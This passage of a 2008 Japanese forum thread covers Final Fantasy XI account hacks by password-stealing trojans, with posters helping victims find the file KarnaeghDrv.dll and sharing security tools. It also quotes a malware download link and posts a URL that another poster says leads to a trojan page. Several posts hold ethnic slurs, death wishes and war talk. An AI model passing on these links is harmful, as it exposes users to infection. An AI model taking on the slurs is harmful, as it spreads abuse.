455 名前：既にその名前は使われています：2008/08/16(土) 05:58:04 ID:bBKtzxt9: >>453
スレ違い

>>454
クリリン
456 名前：既にその名前は使われています：2008/08/16(土) 05:59:19 ID:0TDZDaBV: ★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
　　・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
　　・使用ブラウザのスクリプト実行を不許可にすることをお勧めします

前スレ　●● RMT業者の垢ハックが多発している件36 ●● http://changi.2ch.net/test/read.cgi/ogame/1218621315/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
　　　不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
　　　受付：月曜～金曜　11:00～19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning（垢ハックについての対策とか詳しく載ってます）　ttp://miku.xrea.jp/
　　　　　(xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題まとめサイト（初心者さん向け）　ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニに法的責任を！」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
　　別スレ　●● FF11垢ハック巻き戻し状況報告スレ ●●　http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
　　勇気がなくて踏めない人のための鑑定ｽﾚPart18　http://pc11.2ch.net/test/read.cgi/hack/1208760889/
　　※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
457 名前：既にその名前は使われています：2008/08/16(土) 06:00:00 ID:0TDZDaBV: 次回テンプレは、これなら問題ないのかな
458 名前：既にその名前は使われています：2008/08/16(土) 06:01:48 ID:AULPU5KE: >>454
見つからないのに何故感染していると分かったのか？
459 名前：既にその名前は使われています：2008/08/16(土) 06:03:32 ID:0TDZDaBV: >>454
■「KarnaeghDrv.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
460 名前：既にその名前は使われています：2008/08/16(土) 06:05:23 ID:+S+ESvg2: >>455
はい('・ω・`)

>>458
カスペルのオンラインスキャン
461 名前：既にその名前は使われています：2008/08/16(土) 06:10:03 ID:AULPU5KE: >>460
コマンドプロンプトから
attrib c:\KarnaeghDrv.dll /s -s -h -r
（c:\は見つかったドライブ）
これやった後にそのフォルダ見に行ってみて
462 名前：既にその名前は使われています：2008/08/16(土) 06:12:58 ID:bBKtzxt9: >>454
どうせフォルダオプションいじってないだけだろ

この程度がわからないなら迷わずクリリン、レジとか触れないだろうし
463 名前：既にその名前は使われています：2008/08/16(土) 06:44:22 ID:+S+ESvg2: ありがとうございます。
先生達のやり方でファイル発見できました。
（隠しを含むすべてを検索するで表示できるのかと思ってました＞＜）
で、発見できたのですが普通に削除できずどうしたものかと思っていて
しばらくしてからもう一度検索したらファイルが消えてました（？）
カスペルさんが知らないうちに駆除してくれたのかよくわかりませんが寝ますー。
ありがとうございましたｍ（＿＿）ｍ
464 名前：既にその名前は使われています：2008/08/16(土) 06:47:36 ID:EaYAjUTE: >>463
いやいや、、カスペルスキー入れてるの？
先ほどオンラインスキャンでみつけたとか書いてたからインストールしてるのかよくわからんが
ちゃんと完全スキャンをしたほうがいいよ
465 名前：既にその名前は使われています：2008/08/16(土) 06:52:28 ID:bBKtzxt9: マジレスしても無駄だろ、ほんと知識無いにしても程があるレベルだし調べないわじゃしょうがない

危機感の無さがありえないんだが
466 名前：既にその名前は使われています：2008/08/16(土) 07:03:18 ID:bgfTFsLF: まったくわからないうちは、調べてもわからないんだけどね
似たような事例を見つけても、実際自分と同じなのかどうかも判断できないし

しばらくしたら消えたってなんだろうね・・・
467 名前：既にその名前は使われています：2008/08/16(土) 07:07:31 ID:RvLx6bth: >>465
おまえリアルで嫌なことでもあったのか？
答える気がない、レスを見てイラつくならこのスレ見に来るなよw
468 名前：既にその名前は使われています：2008/08/16(土) 07:11:43 ID:bBKtzxt9: ウイルスの定義名がわかってるのにわからないとかありえないだろ
検知したソフトのHP行けば対応方法、削除方法全て載ってるのに

>>467
そっくりそのまま返すぞ、てかあれだけの情報じゃ誰も答えられないがな
469 名前：既にその名前は使われています：2008/08/16(土) 07:23:48 ID:+o1kzlZb: 一晩で伸びたな、垢ハックの嵐が到来か？いや、単に夏が来たってだけかw
470 名前：既にその名前は使われています：2008/08/16(土) 07:39:04 ID:gj99/ws/: >>468
答えられないなら黙ってればいいだろｗ
煽って楽しんでる性悪だろ
471 名前：既にその名前は使われています：2008/08/16(土) 07:39:15 ID:bgfTFsLF: 情報が足りないなら、何の情報が欠如しているせいで答えられないのか書いてあげたらいいじゃない・・・
472 名前：既にその名前は使われています：2008/08/16(土) 08:14:00 ID:+o1kzlZb: とりあえず、落ち着いてテンプレ読んでね。で良いんじゃないか？
473 名前：既にその名前は使われています：2008/08/16(土) 09:01:57 ID:wu1hDPk8: ある掲示板でこんな書き込みを見つけた。

1 名前：きゃん太　2008/08/07 01:50
※公式行った方が綺麗に見えるかも → //ff11ro■com/mov0033■exe

罠ファイルはリンク切れ？
WHOISはいつもの福建竜岩、5月登録だが今のところリネ資料室には載っていない。

/のソースが興味深い、テキストで色々URLがかかれているのでソースチェッカーで覗いて見る事お勧め。

実際アクセスして中を覗くとrar圧縮のトロイかな？幾つかあるね。

気をつけてくれよな！
474 名前：既にその名前は使われています：2008/08/16(土) 09:50:02 ID:xXTkqh5W: >>461
そのコマンドなんですが、>>17の(2)のように
attrib %SystemRoot%\system32\KarnaeghDrv.dll /s -s -h -r
じゃダメなのですか？
このコマンドだと存在しない事になってますが、461さんのだと無反応、、という事は
system32以外のフォルダにKarnaeghDrv.dllが存在しているって事でしょうか？
475 名前：既にその名前は使われています：2008/08/16(土) 09:54:13 ID:bgfTFsLF: 無反応って？
476 名前：既にその名前は使われています：2008/08/16(土) 09:57:23 ID:pZXAGyGR: >>473
これは酷いな
www.uploda.org/uporg1612457.jpg.html
aguseで取得したSSうpしてみた
477 名前：既にその名前は使われています：2008/08/16(土) 09:57:56 ID:AULPU5KE: >>475
そのドライブにいなければ「ファイルは存在しません」
何も表示されず次のコマンド受付状態になればどこかにいる
どこにいるか知りたければ
attrib c:\KarnaeghDrv.dll /s
（c:\は見つかったドライブ）
これでファイルのパスが表示される
478 名前：既にその名前は使われています：2008/08/16(土) 10:07:57 ID:1Gm/eMj2: >>449
一旦システムの復元をすべて無効にすれば消える。
479 名前：既にその名前は使われています：2008/08/16(土) 10:10:45 ID:xXTkqh5W: >>475
attrib c:\KarnaeghDrv.dll /s -s -h -r
こちらのコマンドだとコマンドプロンプトでは何も表示されずに
attrib %SystemRoot%\system32\KarnaeghDrv.dll /s -s -h -r
こちらだとファイルは存在しませんと出たので、、、という事でした。
>>477
attrib c:\KarnaeghDrv.dll /s
では、ファイルが見つかりません -C:\KarnaeghDrv.dll
という事だったので、、、とりあえずこの方法の調べ方ではCドライブに存在してないっぽい
って事で良いのでしょうか
480 名前：既にその名前は使われています：2008/08/16(土) 10:12:33 ID:bgfTFsLF: >>477
そういうことか！ありがとう
存在する場合はどう表示されるのか知らなかった
481 名前：既にその名前は使われています：2008/08/16(土) 10:14:03 ID:qWc24VrS: 実際、一日にどれくらい被害がでてるんだ？、とりあえず、俺が１ｗ
スクエニは把握してるだろうから、いろんな情報を出して、もっと注意を喚起すべき

潜在的にはハックされてもおかしくない人が山ほどいて、業者がハックしきれない
ような気がするんだが
482 名前：既にその名前は使われています：2008/08/16(土) 10:14:14 ID:AULPU5KE: >>463
消えた理由の推測
１、勝手に消えた
２、違う名前になった
３、使用中のアンチウィルスソフトが対応して、自動的に隔離もしくは削除された
４、ウィルスにレジストリを改変されて>>459のやり方でも隠しファイルが見えないようにされた
（この場合attribコマンドならいるかどうか調べられる）
483 名前：既にその名前は使われています：2008/08/16(土) 10:34:19 ID:AULPU5KE: >>479
attribコマンドはattrib /?ってして貰えば分かるけど
ファイルの属性を表示または変更するコマンド
attrib c:\KarnaeghDrv.dll /s はCドライブにKarnaeghDrv.dllがいる限りファイルパスを返してくるので
それで見つかりません表示ならCドライブにはいないことになる
484 名前：既にその名前は使われています：2008/08/16(土) 10:44:38 ID:o0PTecta: MMO無関係者、スイーツ共やセキュリティに無関心な奴ら、企業や官公庁あわせると
潜在的には物凄い人数が感染してそうな・・・。
MMOのIDやPASS以外の個人情報抜かれるよう仕掛けられていたら、えらいことだ。
485 名前：既にその名前は使われています：2008/08/16(土) 10:55:10 ID:dz6Jb4XX: >481
どうなんだろうね、俺の周りには全然被害者いないが
486 名前：既にその名前は使われています：2008/08/16(土) 11:07:45 ID:ql77kMIR: >>481
最盛期に業者のデータサーバに田代しかけた人がいて、
その時に覗いた時は１日で約500件ほどID・パスデータが蓄積されていたらしい。
同種のパス抜きトロイのデータ送り先は２ヶ所あったので、単純計算で1000件/日。
複合パス抜きだったり同じユーザーが複数回引っかかったりで有効？実数はもう少し下がるだろうけど。

でもって連中はこれをリスト化して順次処理してると思われるので
（７月に猛威を振るったトロイの起こす「ハックの兆候」から実被害まで１週間～1ヶ月程ラグがあった）
「１日」の被害実数は業者の処理可能なキャパシティ以上には増えないだろうけど、
潜在的被害者（処理待ち）は日に日に増えていってるんじゃないのかな。
487 名前：既にその名前は使われています：2008/08/16(土) 11:14:11 ID:zwbDNz9z: 名前まで知ってんのは1人だけだな
子供生まれるっつー理由で空LS脱退したくせに輪をかけて廃プレイに勤しんでた女
巻き戻してもらったらしいが
子供のためにももう一回ハックされて引退したほうがいいんでないかな…ｗ
488 名前：既にその名前は使われています：2008/08/16(土) 11:19:02 ID:o50p2CZf: attrib c:\KarnaeghDrv.dll /s　って表示されるまでちょっと時間かかるんだね。
489 名前：既にその名前は使われています：2008/08/16(土) 11:21:16 ID:AULPU5KE: >>488
ファイル検索が表示まで時間がかかるのと同じ事だよ
490 名前：既にその名前は使われています：2008/08/16(土) 11:54:14 ID:Z7u4VtkH: FFはPS2でFF系ブログはPCなんて人も結構居るから、罠にはまった数=有効垢ハック被害者
ではないとは思うけど、業者は新たに罠張って１ヶ月くらいは入れ食い状態だろうね。
一番の問題は、サイバー犯罪は中国国内からであれば全てセーフという現実。
日本と中国の間に犯罪人引き渡し条約はない、日本はアメリカと韓国のみだっけ？

かと言って中国と条約を相互締結すればいい、って問題でもないんよね。
例えば、無実の日本国民を中国が「でっちあげ」の罪状で引き渡し請求する、するとどうなるか。
罪があるかも怪しい自国民を、日本政府は中国司法当局に引き渡すことになる、その方が大問題。
政治とか司法ってのは難しいねぇ、てか民主国家でもないのに国連常任理事国で、マンパワーも
経済成長も桁外れの大国=中国だから、アメリカですら派手に敵対できない国だからねぇ・・・
491 名前：既にその名前は使われています：2008/08/16(土) 11:56:54 ID:yUp0prid: 世界中の政府機関に時間かけて同胞を潜り込ませてきた中国に死角なし
492 名前：既にその名前は使われています：2008/08/16(土) 11:57:09 ID:U22SFD1Y: 中国潰せばいいのにな。せんそーだーーー！
493 名前：既にその名前は使われています：2008/08/16(土) 11:59:45 ID:+o1kzlZb: >>490
運営、と言うかsagesundiが張ったリンクシェルコミュニティβという罠は酷かったな。

中国は・・・困ったな。
日本がどうにか出来る最大のチャンスを永遠に失ってしまったからな。
予言されているアジアの大地震もなんだか日本に直撃しそうな悪寒がするし、
それが中国、南北朝鮮で起こってくれればいいのだけれど・・・

かの国共は日本で起こったら大喜びで支援という名目で軍隊送り出してし
日本全土を実効支配するつもりだろうな・・・
494 名前：既にその名前は使われています：2008/08/16(土) 12:00:49 ID:bgfTFsLF: >>492
冗談でも言っていいことと悪いことがあるよ
495 名前：既にその名前は使われています：2008/08/16(土) 12:08:44 ID:qmwBd4Ez: >>494
むしろお前みたいなのはネ実こないほうがいい
496 名前：既にその名前は使われています：2008/08/16(土) 12:17:19 ID:iIeM2Uhf: >>481
FFだけじゃなくて複合ウィルス、しかもMixiやLineageやらROも入れたら
物凄い数になるんじゃねーのかな。
PG2で使ってるブロックリストだって元はLineageのパス抜き対策用だしな。
497 名前：既にその名前は使われています：2008/08/16(土) 12:28:32 ID:Z7u4VtkH: 中国も時間が経てば民主化に向かう、ただ劇的な変化は見込めない、すっごく時間が必要。
今の大国を維持するには諸外国や大国との国交は必須、間違っても国境超えて戦争なんて
起こせない、だからチベット辺りで満足する、越境戦争はどう考えても自滅行為。
日本も日米安保があるから、日本本土への攻撃はアメリカ本土への攻撃に値する、テラ安全。

問題は中国の御国事情、社会も経済も成熟していない今の状況で民主化なんてしたら、
間違いなく真っ先に全力で日本を攻め始める、それが諸外国やアメリカを敵に回すとしても
後先なんて考えない、それが現実、米軍が核落とすまでやめない、落としてもやめないかも、
だから中国には緩やかに変革してもらうしかない。
むしろ中国政府が国民を押さえきれない節のある昨今、クーデターでも起こったら周りの国が
マジヤバイ、超ヤバイ、メタミドホスなんてレベルじゃない、肉まん割ったら具が無いくらいヤバイ。
498 名前：既にその名前は使われています：2008/08/16(土) 12:33:32 ID:Z/TjMW/M: 政治的主張したい奴はどっか行けよ
499 名前：既にその名前は使われています：2008/08/16(土) 12:34:19 ID:vgQ22Ts5: 日本攻撃されたら世界のオタが怒るんだろうな・・・・
いや・・・だからなに？言われても困るけど・・・
500 名前：既にその名前は使われています：2008/08/16(土) 12:41:09 ID:3n0ccyNC: カスペとかノートンとかのオプション推奨設定みたいなのテンプレに追加希望
501 名前：既にその名前は使われています：2008/08/16(土) 12:42:27 ID:U6vHJC0Z: 中国に変化を望むのは無駄でございます
我々ができるのは被害届けを出すこと、これに尽きます
あと、日本人のRMT卸売業者もどうにかできればいいんだけど
ネット関連の法整備が急がれるねぇ
502 名前：既にその名前は使われています：2008/08/16(土) 12:43:06 ID:L0+o34Vd: >日本も日米安保があるから、日本本土への攻撃はアメリカ本土への攻撃に値する、テラ安全。

スレチだが言っちゃうぜ
安保を妄信してはいけない
アメリカは現実主義の国
日本を守ることが、リスクに比べてアメリカの国益が少ないと判断すれば
「やっぱ日本守るのやーめたｗ　アメリカ人の血を日本のために流す道理はねーべ　ていうか自分の国くらい自分で守れやﾎﾞｹﾞ」
で静観するだけ

日本国民は自分できちんと軍隊を持って自国を守るという
国家としての基本原則を忘れてしまったのが問題
503 名前：既にその名前は使われています：2008/08/16(土) 12:44:14 ID:xXTkqh5W: >>483
なるほど、そうでしたか、ありがとうございますm(_ _)m
504 名前：既にその名前は使われています：2008/08/16(土) 12:58:58 ID:3KKW40Ku: いまやRMT市場はマネーロンダリングの手段になりつつあるね
893が裏で手を出し始めてるだろう
505 名前：既にその名前は使われています：2008/08/16(土) 12:59:18 ID:uIll6Kqy: 裏だの空だの入っているヤツなら、ハック被害者２、３人は聞くくらいのレベルかな、今は。
506 名前：既にその名前は使われています：2008/08/16(土) 14:06:32 ID:DzlgalHj: ■「KarnaeghDrv.dll」
ってＦＦ１１だけじゃなくて信オンのパスも抜ける？
ＦＴＰのパスも抜けたりする？
507 名前：既にその名前は使われています：2008/08/16(土) 14:14:06 ID:1Qzgm2CV: >>506
信オンは抜かれるんじゃなかったかな
508 名前：既にその名前は使われています：2008/08/16(土) 14:32:34 ID:OQt+IQup: >>506
他に抜かれるｹﾞｰﾑがまとめられてるとこないかな？
509 名前：既にその名前は使われています：2008/08/16(土) 14:53:02 ID:+FQOyp5w: >>492
中国自体は戦力も並み程度の雑魚だが数の暴力が怖いんだぜ？
エリート兵１人に対し１００人の雑兵が一気にかかってくるからマジで怖い
510 名前：既にその名前は使われています：2008/08/16(土) 14:57:32 ID:AgQhz05J: フォルダオプションをいじってカスペルスキーで完全スキャンして検知無しだったのですが、
コマンドプロンプトにattrib c:\KarnaeghDrv.dll /sを入れても
ファイルが見つかりません。存在しません。が出ません。
これはまだ存在しているという事なのでしょうか？
511 名前：既にその名前は使われています：2008/08/16(土) 15:22:18 ID:0TDZDaBV: >>510
コマンドでの検索だと、なにも表示されなかったりする例が前にもありました
環境によって表示が異なる可能性もありますから、普通にExplorerで検索して
みてください(↓の設定を忘れずに)

■「KarnaeghDrv.dll」がPCに存在するか調べる方法
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
512 名前：既にその名前は使われています：2008/08/16(土) 15:39:59 ID:AgQhz05J: >>511
ありがとうございます。
検索してみた所何も見つかりませんでした。
パソコンには疎くて不安だったのでとても助かりました。
513 名前：既にその名前は使われています：2008/08/16(土) 15:59:49 ID:AULPU5KE: OSがVistaとかだとattribの挙動が違うのかな？
514 名前：既にその名前は使われています：2008/08/16(土) 16:30:47 ID:xXTkqh5W: >>513
IDで分かると思いますけど、Vistaでは自分のカキコした感じでしたね。
attrib c:\KarnaeghDrv.dll /s
ではいちよう、「ファイルは存在しません」って出てました。
515 名前：既にその名前は使われています：2008/08/16(土) 16:48:22 ID:TEYExc6O: つうかKarnaeghDrv.dll をどこで拾ってきたのか本当に記憶がない、、、
運が悪かったとしかいえんな、、、、
516 名前：既にその名前は使われています：2008/08/16(土) 17:03:17 ID:1iHCODHu: >>509
それなんてBETA?
517 名前：既にその名前は使われています：2008/08/16(土) 17:14:26 ID:rN2j6TLi: 戦車級ですねわかります
518 名前：既にその名前は使われています：2008/08/16(土) 17:16:53 ID:AgQhz05J: 語句KarnaeghDrv.dllを含めて検索したら2件かかりました・・。
まだ検索途中なのですがこれは削除してしまったほうがいいのでしょうか・・
519 名前：既にその名前は使われています：2008/08/16(土) 17:23:37 ID:BHhJcwZ0: >>518
ウィルスのおおもとが残ってますね
何度消しても同じように再生してくると思います
クリーンインストールしてリカバリーされたほうがいいでしょう
520 名前：既にその名前は使われています：2008/08/16(土) 17:27:45 ID:2qdNihrv: カスペ重いよ・・・・
ノートンも重かった
はーハイスペックPC買わなきゃダメかなー
住みづらい世の中になりました。
521 名前：既にその名前は使われています：2008/08/16(土) 17:28:35 ID:AgQhz05J: >>519
なるほど・・カスペルスキーを信用しすぎて既にアカウントの復旧を申し込んでしまったので
もう手遅れかもしれないです・・
復旧完了メールが来るまでにクリーンインストールをして、
メールが届き次第パス変更をしてみようと思います。
ありがとうございました。
522 名前：既にその名前は使われています：2008/08/16(土) 18:45:04 ID:AULPU5KE: >>514
ファイル属性の変更するときのattribの正しい構文は
attrib -R -S -H C:\○○ /S　だけど
XPだと
attrib c:\○○ /s -s -h -r でも問題なかったりする
Vistaとかだと正しい方じゃないと動かないとかかも知れない
523 名前：既にその名前は使われています：2008/08/16(土) 19:50:57 ID:jKCVKL5/: 埼玉人なんだが
なぜか新潟簡易裁判所から
特別送達とやらがきた
正確には不在通知だが
交通違反で呼び出されるはずねーし
（半年以上前に一方通行でつかまったくらい）
会社関係か？と思ってもそもそも新潟に関係などない
ヤフオクのトラブルでいきなり訴訟ふっかけてくる奴いないだろうし
ありえるのは小額訴訟詐欺
まさかハックで獲得した個人情報を
中華が日本の詐欺グループに売っている？？
524 名前：既にその名前は使われています：2008/08/16(土) 20:01:49 ID:Z/TjMW/M: 何の呼び出しだか判明してから書けよｗ
525 名前：既にその名前は使われています：2008/08/16(土) 20:03:18 ID:/vtq2LR9: PC換えたからまっさきにカスペとPG2入れようとしたら
PG2日本語版の実行ファイルリンク切れてるし
526 名前：既にその名前は使われています：2008/08/16(土) 20:09:52 ID:ppkBeJKd: >>525
>>15
なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください

とは違う？
527 名前：既にその名前は使われています：2008/08/16(土) 20:11:00 ID:jtW7odQo: 前スレで仮想環境どれが良いのかって質問があった気がするのでメモ。

・VMWare　
　　基本的に有料
　　無料な物や、無料で使う方法もあるが、ちょっと手数が必要。つまり導入がめんどい
　　テスト段階だが、DirectXも利用できる(軽いMMOレベルなら動かせる)
　　USB 2.0対応
　　ホスト、ゲストをあまり選ばない

・VirtualBox
　　無料、最新版はWinXP以降
　　USB2.0対応、DirectX未対応
　　ホスト、ゲストをあまり選ばない

・VirtualPC
　　無料、最新版はWinXP以降
　　USBは使えないと見たほうが楽、DirectX未対応
　　ホストはWindows限定。ゲストもWindows系以外はうまく動かないことがある

個人的にはVirtualBoxが無難かと。
528 名前：既にその名前は使われています：2008/08/16(土) 20:18:29 ID:Ce3TWb7L: 被害にあって全部補償されると勘違いしてるバカは下みとけ

ttp://www.jcp.or.jp/akahata/aik07/2008-08-15/2008081501_01_0.html
529 名前：既にその名前は使われています：2008/08/16(土) 20:39:55 ID:Z/TjMW/M: アレなのがファビョりだすから政党機関紙は貼るなよ
530 名前：既にその名前は使われています：2008/08/16(土) 20:43:06 ID:jKCVKL5/: すまねー
まったく別件
ヤフオクの話ですた
すげーヤクザみたいな相手が
欠品してるもんがあるぞゴルァ
自分は法関係の知人がたくさんいるぞと脅して
訴状送ってきただけですた
あまりにも脅しな文章書くのでみてなかった
531 名前：既にその名前は使われています：2008/08/16(土) 20:49:46 ID:Z/TjMW/M: >>530
http://pc11.2ch.net/yahoo/
532 名前：既にその名前は使われています：2008/08/16(土) 20:51:46 ID:7O1T9rAZ: >>530
スレチレスすまそ
訴状ってことは、多分小額訴訟かなんか起こされてるんだと思うが、
どんなＤＱＮ相手でも、裁判は放置したら負けて強制執行（給料差し押さえとか）
されるから、気をつけろよ。
どうせ新潟までなんて来るわけねーって思ってる確信犯の可能性高し。
533 名前：既にその名前は使われています：2008/08/16(土) 20:54:58 ID:7O1T9rAZ: メールのやりとりとか証拠になるから、ヘッダつけて印刷しとけ。
534 名前：既にその名前は使われています：2008/08/16(土) 21:07:15 ID:iIeM2Uhf: >>530
小額訴訟拒否で、通常裁判にしてやれ。
535 名前：既にその名前は使われています：2008/08/16(土) 21:08:44 ID:BHhJcwZ0: PG2の日本語版DLについて前スレより

210 ：既にその名前は使われています：2008/08/06(水) 22:11:22 ID:qXUrpr6O
WebArchive経由で日本語版落とせるけど
これでいいかな？

211 ：既にその名前は使われています：2008/08/06(水) 22:15:04 ID:qXUrpr6O
PG2の日本語版

212 ：既にその名前は使われています：2008/08/06(水) 22:28:56 ID:jq6M1t+z
あー　落とせますね　
2008/1/20の落としてみて　virustotal.に投げてみたけどだいじょぶそ。
ttp://www.virustotal.com/jp/analisis/492cc86029a51795f4c18d6e352b0803

●ttp://web.archive.org/web/20080209171747/●ttp://www.dukedog.flnet.org/trans.html
※あちらサイトが使えなくなっている理由・原因はわかりません
　●部分2ヶ所に h を入れてください
　2008/2/9のデータを上記と同じようにvirustotalに投げて、結果は解析済み以外に
　なにも出ませんでしたので大丈夫です(わたしもこれを使っていて不都合はありません)
536 名前：535：2008/08/16(土) 21:10:35 ID:BHhJcwZ0: ページに飛ぶと文字化けしているかもしれませんから、そのときは
エンコードで日本語(自動選択)を選べば解消します
537 名前：既にその名前は使われています：2008/08/16(土) 21:25:03 ID:5KXTGrsq: >>530
地元の管轄裁判所への移送手続きと、通常手続移行申立てがお薦めか。
恐喝まがいの少額訴訟提起なら、これが効果的。
538 名前：既にその名前は使われています：2008/08/16(土) 21:34:58 ID:tmRDIQD1: 頭の悪い小日本人何をしても無駄脳足らないし死ね
539 名前：既にその名前は使われています：2008/08/16(土) 21:35:22 ID:gJK0bXD+: >>521
いまさらだけど、含むでひっかかったのって
カスぺルのとかspybotのファイルじゃないか？？
540 名前：525：2008/08/16(土) 21:50:32 ID:/vtq2LR9: >>526
>>535
ありがとう！とりあえず英語版入れてしのいでたけど
入れ直すは。
ただ今無印からアルタナまで計10枚インスコ終わって絶賛VU中。
541 名前：既にその名前は使われています：2008/08/16(土) 21:59:05 ID:lxCzswJG: >>528
アカは中華と同類だろ
死ねよ^^;
542 名前：既にその名前は使われています：2008/08/16(土) 22:03:24 ID:+mDqdjWk: >>540
火狐＋NoScriptも忘れないようにネー
543 名前：既にその名前は使われています：2008/08/16(土) 22:11:12 ID:jKCVKL5/: >>532
うん小額訴訟は何もアクション起こさなければ
訴訟したもん勝ちってのは知ってます
一時期架空請求流行ったからね
>>533
やりとりが証拠と言っても
くだらないいちゃもんと思って放置してただけだしなあ
自分の聞いた話ではこういう知人がいるぞとかは脅しになるらしいが
>>534
まあこちらにも落ち度はあるんで
物送ってちょびっと返金
に応じなければこちらもアクション起こすわ

つーかなんでみんな反応してくれるんだｗありがとうｗ
544 名前：既にその名前は使われています：2008/08/16(土) 23:51:35 ID:ydC0hN8D: >>543
｢暇な人が情報出し合ってー｣で構成された、ある意味で投げっぱなしな珍しいスレッドだからなー。ここ。
まあ、役に立つ情報貰えてよかったじゃまいか。
545 名前：既にその名前は使われています：2008/08/17(日) 00:27:56 ID:u+7BYvIL: FF11WARNING管理人です。
帰宅しましたのでアクセスのループの件設定を変更しました。
単純にエラーが返るように改善されていると思います。
ご迷惑をおかけして申し訳ありませんでした。
また　超眠いよっぱらいなので乱文となりますことも先にお詫び申し上げます。

帰省中ネットのない環境におりましたので　１０３９０４５７４４：８８について
感染の判明しているサイトについてリソースのチェックを行いましたところ
諸般の事情で詳細は書けないのですがXREA側の説明で概ね納得できる状態となりました。
スレやその他のソースを確認のうえ早い時期にまとめてアップする予定ですが
ミラーのほうはmiku.xrea.jp修正から1時間以内には同内容に更新されているはずで
スレテンプレぽいのもミラーリングしてありますので
（スレ流し読みして変更あるようなので一両日中には更新しておきます)
スレ的にはミラーにアクセスしていただくほうがいいかもです。

関連して若干スレチになりますが　XREAがサポートフォーラムのphp更新で記述している内容と実際のサーバの設定に齟齬があります。
XREAユーザーの方々には　phpinfoの確認を推奨いたします。
おやすみなさい＞all
546 名前：既にその名前は使われています：2008/08/17(日) 01:18:54 ID:e5W+tY6I: パスワードが簡単に変えられてしまうのは完全にスクエニのミスだよ
普通はパスワード変更の時に生年月日ぐらいは確認する。
547 名前：既にその名前は使われています：2008/08/17(日) 01:22:10 ID:zui7K53Q: >>545
夜分ご苦労様です_(._.)_

良い意味で情報発信してる人もいるのに
XREAどうなってんねんヽ(｀Д´)ノ

PC使ってる人は各自気をつけましょう(T-T)
548 名前：既にその名前は使われています：2008/08/17(日) 01:44:41 ID:Q/CzFlgR: >>546
さすがにパスワード変更の再に誕生日聞くネトゲなんて聞いたことないぞｗ
大抵は現行パスワードを入れれば変更できるぞ。
549 名前：既にその名前は使われています：2008/08/17(日) 01:50:50 ID:WPruVigG: >>548
それお前が無知なだけ
採用してるゲームはかなり多い。
ネカフェからプレイできるゲームの中ではFF11は一番セキュリティーが甘い。
パス盗まれるとクレカまで使われるのはFFぐらい
550 名前：既にその名前は使われています：2008/08/17(日) 02:01:26 ID:kYIvJQLe: サイトに罠張られてるってことは11関連のサイトは見ちゃ駄目ってことですか？
要するに攻略は書籍のみにしろと
551 名前：既にその名前は使われています：2008/08/17(日) 02:06:46 ID:gtypf241: >>550
FFと全く関係ないサイトでもやられる可能性あり
552 名前：既にその名前は使われています：2008/08/17(日) 02:33:32 ID:Q/CzFlgR: >>549
仕事柄いろんなネトゲに触ってるんだが見たことないんだよね・・・
具体的にそれ採用してるネトゲって何がある？
試してみるわ・・・
553 名前：既にその名前は使われています：2008/08/17(日) 04:07:26 ID:TU2WoLGz: また江頭かよ・・・
http://panterorr.com/dfsqras.jpg
554 名前：既にその名前は使われています：2008/08/17(日) 04:10:01 ID:5+Tq9gvM: 一応警告な！
ウラル何でもかんでも踏んじゃダメだぞ！
555 名前：既にその名前は使われています：2008/08/17(日) 04:11:05 ID:ts4WOJGA: >>553
ワロタｗ
556 名前：既にその名前は使われています：2008/08/17(日) 04:16:37 ID:TDNvZxbv: 553はトロイ仕込まれるページにとばされる。
555みたいなレスを別IDでつけたりマジ悪質だな。
557 名前：既にその名前は使われています：2008/08/17(日) 04:28:50 ID:vy91i/27: ニュー速の在日あたりがやらかしてるんじゃないの
江頭ネタで一番速いだろ
558 名前：既にその名前は使われています：2008/08/17(日) 05:54:39 ID:O4jKMdzb: Janeでおｋ
559 名前：既にその名前は使われています：2008/08/17(日) 07:00:10 ID:01MmIQoE: >>552
ネトゲに限らず、パスワードの変更時に個人認証するのは当たり前だと思うが
個人認証もせずにパスワード変更する方が異常
仕事柄と言ってるな、そんな程度の低いセキュリティー意識でやってるわけ？
560 名前：既にその名前は使われています：2008/08/17(日) 07:00:15 ID:ndqT0NUw: 初心者な質問ですみません。
PeerGuardian2を導入しようと思い、テンプレのリネージュ資料室を参考に、hosts変更を試みました。

>メモ帳が開かれるので、一番下の行に「危険URL」にある「hosts追加用」のファイルに記載された設定を
>コピー&ペーストします。

ここがうまくできなくて、ファイルの保存形式が.txtになってしまいます。
なにか見落としがあればご教授お願いします。

ユーザーアカウントはOwnerでコンピュータ管理者権限ありな感じです。
561 名前：既にその名前は使われています：2008/08/17(日) 07:21:36 ID:9luk4BkM: よく分からんけど取り合えずパスを変更するときに誕生日を入れるネトゲの名前を列記するべき
話はそれから

つか仮想osにいれるlinuxは何がいいのかのう
日本語使えそうなのでvineとかubuntuとか？
